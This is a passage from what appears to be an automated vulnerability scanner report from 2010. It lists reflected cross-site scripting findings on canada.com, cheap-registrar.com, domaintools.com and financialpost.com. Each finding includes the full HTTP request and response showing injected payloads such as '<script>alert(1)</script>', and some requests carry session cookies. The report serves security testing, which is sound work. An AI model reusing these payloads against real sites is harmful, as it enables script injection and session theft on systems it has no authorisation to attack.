The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5f46'%3balert(1)//9b6decae86e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d5f46';alert(1)//9b6decae86e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?d5f46'%3balert(1)//9b6decae86e=1 HTTP/1.1
Host: www.canada.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 272523
Expires: Sun, 19 Dec 2010 03:08:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:08:07 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=1camde55elyruhzm0d0hya45; path=/; HttpOnly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
acebook/poll.html';
   var bundle_id = '';
   var question = 'Is an e-mail a good enough substitute for a Christmas card?';
   var voted = 'False';
   var poll_url = 'http://www.canada.com/facebook/poll.html?d5f46';alert(1)//9b6decae86e=1&qid=106525';
   var poll_topic = 'Christmas cards';
   var encoded_poll_url = 'http%3a%2f%2fwww.canada.com%2ffacebook%2fpoll.html%3fd5f46'%3balert(1)%2f%2f9b6decae86e%3d1%26qid%3d106525';
   var host = 'h
...[SNIP]...

1.10. http://www.cheap-registrar.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cheap-registrar.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d254"><script>alert(1)</script>ad40d2e47f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5d254"><script>alert(1)</script>ad40d2e47f1=1 HTTP/1.1
Host: www.cheap-registrar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 03:07:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 738

<html><head>
<meta name="DESCRIPTION" content="DomainsTools and Cheap Registrar help you get started in the Domain business.">
<title>$1.99 Registrations at Cheap Registrar</title></head>
<!-- Redirec
...[SNIP]...
<a href="http://www.securepaynet.net/5d254"><script>alert(1)</script>ad40d2e47f1=1">
...[SNIP]...

1.11. http://www.cheap-registrar.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cheap-registrar.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a2ea"><script>alert(1)</script>6b27097126 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?3a2ea"><script>alert(1)</script>6b27097126=1 HTTP/1.1
Host: www.cheap-registrar.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 03:07:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 736

<html><head>
<meta name="DESCRIPTION" content="DomainsTools and Cheap Registrar help you get started in the Domain business.">
<title>$1.99 Registrations at Cheap Registrar</title></head>
<!-- Redirec
...[SNIP]...
<frame src="http://www.securepaynet.net/3a2ea"><script>alert(1)</script>6b27097126=1" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0>
...[SNIP]...

1.12. http://www.domaintools.com/products/history-block.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /products/history-block.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload df587<a>ce53c9e6599 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /products/df587<a>ce53c9e6599 HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=33219371.1292715062.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dtsession=f8e66a1a6b57b210cae4a35e21ab3535; __utma=33219371.722183777.1292715062.1292715062.1292715062.1; __utmc=33219371; __utmb=33219371.2.10.1292715062;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Dec 2010 04:07:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Sun, 19 Dec 2010 03:07:47 GMT
Content-Length: 6763
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
   <title>Domain Tools: Page Not Found</title>
   
<link rel="alternate" type="applicati
...[SNIP]...
<a>ce53c9e6599">Whois record for "df587<a>ce53c9e6599"</a>
...[SNIP]...

1.13. http://www.domaintools.com/products/reports/reverse-ip.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /products/reports/reverse-ip.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload aa5d8<a>c0b22e683b3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /products/reports/aa5d8<a>c0b22e683b3 HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=33219371.1292715062.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dtsession=f8e66a1a6b57b210cae4a35e21ab3535; __utma=33219371.722183777.1292715062.1292715062.1292715062.1; __utmc=33219371; __utmb=33219371.2.10.1292715062;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Dec 2010 03:58:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Sun, 19 Dec 2010 02:58:11 GMT
Content-Length: 6773
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
   <title>Domain Tools: Page Not Found</title>
   
<link rel="alternate" type="applicati
...[SNIP]...
<a>c0b22e683b3">Whois record for "aa5d8<a>c0b22e683b3"</a>
...[SNIP]...

1.14. http://www.domaintools.com/products/units.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /products/units.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fc9b4<a>517b058ca68 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /products/fc9b4<a>517b058ca68 HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=33219371.1292715062.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dtsession=f8e66a1a6b57b210cae4a35e21ab3535; __utma=33219371.722183777.1292715062.1292715062.1292715062.1; __utmc=33219371; __utmb=33219371.2.10.1292715062;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Dec 2010 04:07:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Sun, 19 Dec 2010 03:07:47 GMT
Content-Length: 6763
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
   <title>Domain Tools: Page Not Found</title>
   
<link rel="alternate" type="applicati
...[SNIP]...
<a>517b058ca68">Whois record for "fc9b4<a>517b058ca68"</a>
...[SNIP]...

1.15. http://www.domaintools.com/reverse-ip/explorer.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.domaintools.com
Path:   /reverse-ip/explorer.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 34784<a>3c620300a71 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /reverse-ip/34784<a>3c620300a71 HTTP/1.1
Host: www.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=33219371.1292715062.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dtsession=f8e66a1a6b57b210cae4a35e21ab3535; __utma=33219371.722183777.1292715062.1292715062.1292715062.1; __utmc=33219371; __utmb=33219371.2.10.1292715062;

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Dec 2010 04:07:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Date: Sun, 19 Dec 2010 03:07:32 GMT
Content-Length: 6765
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
   <title>Domain Tools: Page Not Found</title>
   
<link rel="alternate" type="applicati
...[SNIP]...
<a>3c620300a71">Whois record for "34784<a>3c620300a71"</a>
...[SNIP]...

1.16. http://www.financialpost.com/16994.rss [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /16994.rss

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c848'%3bf5e376ba32d was submitted in the REST URL parameter 1. This input was echoed as 2c848';f5e376ba32d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2c848'%3bf5e376ba32d HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42972


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/2c848';f5e376ba32d/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=2c848';f5e376ba32d;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=91390696?">
...[SNIP]...

1.17. http://www.financialpost.com/17052.rss [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /17052.rss

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce9a4'%3b247ade30c83 was submitted in the REST URL parameter 1. This input was echoed as ce9a4';247ade30c83 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ce9a4'%3b247ade30c83 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42972


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/ce9a4';247ade30c83/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=ce9a4';247ade30c83;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=17499618?">
...[SNIP]...

1.18. http://www.financialpost.com/17082.rss [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /17082.rss

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c4e2'%3bd9af8f915db was submitted in the REST URL parameter 1. This input was echoed as 9c4e2';d9af8f915db in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /9c4e2'%3bd9af8f915db HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42972


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/9c4e2';d9af8f915db/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=9c4e2';d9af8f915db;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=24606352?">
...[SNIP]...

1.19. http://www.financialpost.com/906070.rss [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /906070.rss

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7cf31'%3bc915d077dc3 was submitted in the REST URL parameter 1. This input was echoed as 7cf31';c915d077dc3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /7cf31'%3bc915d077dc3 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42973


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/7cf31';c915d077dc3/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=7cf31';c915d077dc3;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=99344879?">
...[SNIP]...

1.20. http://www.financialpost.com/917156.rss [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /917156.rss

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4aa69'%3be60d6f1c0da was submitted in the REST URL parameter 1. This input was echoed as 4aa69';e60d6f1c0da in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4aa69'%3be60d6f1c0da HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;

Response (redirected)

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42973


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/4aa69';e60d6f1c0da/index;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=4aa69';e60d6f1c0da;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=11025153?">
...[SNIP]...

1.21. http://www.financialpost.com/_assets/css/idc/idms_styles.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /_assets/css/idc/idms_styles.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4855a'%3bc818f85888d was submitted in the REST URL parameter 1. This input was echoed as 4855a';c818f85888d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_assets4855a'%3bc818f85888d/css/idc/idms_styles.css HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:24 GMT
Date: Sun, 19 Dec 2010 03:03:24 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43354


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/_assets4855a';c818f85888d/css/idc/idms_styles;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=_assets4855a';c818f85888d;kw=css;kw=idc;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=39186833?">
...[SNIP]...

1.22. http://www.financialpost.com/_assets/css/idc/idms_styles.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /_assets/css/idc/idms_styles.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c40c4'%3bad7596597dc was submitted in the REST URL parameter 2. This input was echoed as c40c4';ad7596597dc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_assets/cssc40c4'%3bad7596597dc/idc/idms_styles.css HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:29 GMT
Date: Sun, 19 Dec 2010 03:03:29 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43318


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/_assets/cssc40c4';ad7596597dc/idc/idms_styles;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=_assets;kw=cssc40c4';ad7596597dc;kw=idc;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=82870670?">
...[SNIP]...

1.23. http://www.financialpost.com/_assets/css/idc/idms_styles.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
Path:   /_assets/css/idc/idms_styles.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1b313'%3b698c4e0738c was submitted in the REST URL parameter 3. This input was echoed as 1b313';698c4e0738c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /_assets/css/idc1b313'%3b698c4e0738c/idms_styles.css HTTP/1.1
Host: www.financialpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gawx4vai53yfaryj50thxu55

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:34 GMT
Date: Sun, 19 Dec 2010 03:03:34 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 43281


...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/_assets/css/idc1b313';698c4e0738c/idms_styles;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=_assets;kw=css;kw=idc1b313';698c4e0738c;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=18982883?">
...[SNIP]...

1.24. http://www.financialpost.com/_assets/css/idc/idms_styles.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.financialpost.com
